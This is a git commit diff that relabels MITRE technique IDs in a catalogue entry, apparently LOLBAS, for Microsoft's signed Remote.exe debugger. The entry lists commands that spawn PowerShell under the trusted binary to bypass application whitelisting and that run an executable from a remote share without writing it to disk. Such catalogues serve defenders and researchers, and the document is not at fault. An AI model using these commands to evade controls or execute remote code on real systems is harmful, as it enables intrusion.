More changes (mainly changing generic T1218 to dev-specific T1127)

This commit is contained in:
Wietze
2021-11-05 20:06:57 +00:00
parent 8286677dac
commit 2577066af9
19 changed files with 32 additions and 34 deletions

View File

@@ -9,21 +9,21 @@ Commands:
Usecase: Executes a process under a trusted Microsoft signed binary
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreID: T1127
OperatingSystem:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1127
OperatingSystem:
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file
Usecase: Executing a remote binary without saving file to disk
Category: Execute
Privileges: User
MitreID: T1218
MitreID: T1127
OperatingSystem:
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe